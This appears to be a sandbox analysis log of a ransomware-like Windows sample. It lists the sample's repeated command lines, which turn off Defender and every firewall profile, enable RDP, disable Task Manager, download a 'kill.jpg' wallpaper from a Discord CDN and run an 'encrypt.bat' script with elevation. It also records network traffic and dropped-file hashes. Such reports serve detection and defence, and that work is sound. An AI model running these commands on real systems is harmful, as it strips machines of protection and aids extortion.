C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 161.19.199.152.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 181.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
NL 52.142.223.178:80 tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI49722\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

C:\Users\Admin\AppData\Local\Temp\_MEI49722\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\_MEI49722\base_library.zip

MD5 08332a62eb782d03b959ba64013ac5bc
SHA1 b70b6ae91f1bded398ca3f62e883ae75e9966041
SHA256 8584f0eb44456a275e3bc69626e3acad595546fd78de21a946b2eb7d6ba02288
SHA512 a58e4a096d3ce738f6f93477c9a73ddbfcb4b82d212c0a19c0cf9e07f1e62b2f477a5dd468cd31cc5a13a73b93fa17f64d6b516afef2c56d38ede1ace35cf087

C:\Users\Admin\AppData\Local\Temp\_MEI49722\_ctypes.pyd

MD5 bbd5533fc875a4a075097a7c6aba865e
SHA1 ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256 be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
SHA512 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

C:\Users\Admin\AppData\Local\Temp\_MEI49722\python3.DLL

MD5 79b02450d6ca4852165036c8d4eaed1f
SHA1 ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4
SHA256 d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123
SHA512 47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

C:\Users\Admin\AppData\Local\Temp\_MEI49722\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI49722\_socket.pyd

MD5 dc06f8d5508be059eae9e29d5ba7e9ec
SHA1 d666c88979075d3b0c6fd3be7c595e83e0cb4e82
SHA256 7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a
SHA512 57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

C:\Users\Admin\AppData\Local\Temp\_MEI49722\_lzma.pyd

MD5 05e8b2c429aff98b3ae6adc842fb56a3
SHA1 834ddbced68db4fe17c283ab63b2faa2e4163824
SHA256 a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c
SHA512 badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

C:\Users\Admin\AppData\Local\Temp\_MEI49722\cryptography\hazmat\bindings\_rust.pyd

MD5 61d63fbd7dd1871392997dd3cef6cc8e
SHA1 45a0a7f26f51ce77aa1d89f8bedb4af90e755fa9
SHA256 ae3a2936b138a2faa4d0cd6445fae97e441b23f6fdafb1a30e60fd80c37d7df5
SHA512 c31f1f281d354acb424a510d54790ee809364b55425b1d39429e1bb7c379126578260c6f197834339a34833c90e748483aabd426295731f78fcde9580fcd8f9f

C:\Users\Admin\AppData\Local\Temp\_MEI49722\_hashlib.pyd

MD5 eedb6d834d96a3dffffb1f65b5f7e5be
SHA1 ed6735cfdd0d1ec21c7568a9923eb377e54b308d
SHA256 79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2
SHA512 527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad

C:\Users\Admin\AppData\Local\Temp\_MEI49722\_decimal.pyd

MD5 3055edf761508190b576e9bf904003aa
SHA1 f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890
SHA256 e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577
SHA512 87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248

C:\Users\Admin\AppData\Local\Temp\_MEI49722\_cffi_backend.cp312-win_amd64.pyd

MD5 0572b13646141d0b1a5718e35549577c
SHA1 eeb40363c1f456c1c612d3c7e4923210eae4cdf7
SHA256 d8a76d1e31bbd62a482dea9115fc1a109cb39af4cf6d1323409175f3c93113a7
SHA512 67c28432ca8b389acc26e47eb8c4977fddd4af9214819f89df07fecbc8ed750d5f35807a1b195508dd1d77e2a7a9d7265049dcfbfe7665a7fd1ba45da1e4e842

C:\Users\Admin\AppData\Local\Temp\_MEI49722\_bz2.pyd

MD5 223fd6748cae86e8c2d5618085c768ac
SHA1 dcb589f2265728fe97156814cbe6ff3303cd05d3
SHA256 f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb
SHA512 9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

C:\Users\Admin\AppData\Local\Temp\_MEI49722\unicodedata.pyd

MD5 16be9a6f941f1a2cb6b5fca766309b2c
SHA1 17b23ae0e6a11d5b8159c748073e36a936f3316a
SHA256 10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04
SHA512 64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

C:\Users\Admin\AppData\Local\Temp\_MEI49722\select.pyd

MD5 92b440ca45447ec33e884752e4c65b07
SHA1 5477e21bb511cc33c988140521a4f8c11a427bcc
SHA256 680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3
SHA512 40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

C:\Users\Admin\AppData\Local\Temp\_MEI49722\libcrypto-3.dll

MD5 e547cf6d296a88f5b1c352c116df7c0c
SHA1 cafa14e0367f7c13ad140fd556f10f320a039783
SHA256 05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de
SHA512 9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

memory/4616-193-0x00007FF9E5D03000-0x00007FF9E5D04000-memory.dmp

memory/4616-196-0x00000262EB300000-0x00000262EB322000-memory.dmp

memory/4616-198-0x00007FF9E5D00000-0x00007FF9E66EC000-memory.dmp

memory/4616-200-0x00000262EB500000-0x00000262EB576000-memory.dmp

memory/4616-201-0x00007FF9E5D00000-0x00007FF9E66EC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ycxpdfpx.tca.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
